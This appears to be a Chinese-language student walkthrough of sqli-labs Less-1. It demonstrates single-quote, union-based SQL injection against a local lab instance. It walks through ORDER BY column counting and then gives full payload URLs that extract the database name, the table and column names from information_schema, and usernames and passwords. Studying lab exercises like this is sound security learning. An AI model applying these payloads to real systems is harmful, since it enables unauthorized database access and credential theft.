关卡1中黄字提示,进行input id(get请求),加上?id=1回车
出现回显位置,初步判断存在注入点,注入点为单引号注入点
判断源语句的查询列数,断用的语句是Order by (猜测的列数) 语句,接下来采用二分法来确定该数值
先写一个较大的数值(对于查询列数):10
5
3未报错
接下来来获取数据库名,union select联合查询
http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20union%20select%201,2,3%20--%20q(%27为单引号,%20为空格)此时发现没有变化
这是因为只有两个回显位置,将前面的回显出来
此时将id=-1,id=-1不存在,回显正常
接下来可通过回显位置获取数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),3%20--%20q
数据库名为security,在进行爆表名,有如下几个表
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,%20group_concat(table_name)%20From%20information_schema.tables%20Where%20table_schema=%27security%27%20--%20q
得到表名后再以此得到表中的字段名(爆字段)
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=%27security%27%20and%20table_name=%27users%27%20--%20q
可以进行爆数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(id,username,password)%20FROM%20users%20--%20q
爆其它表及数据同理
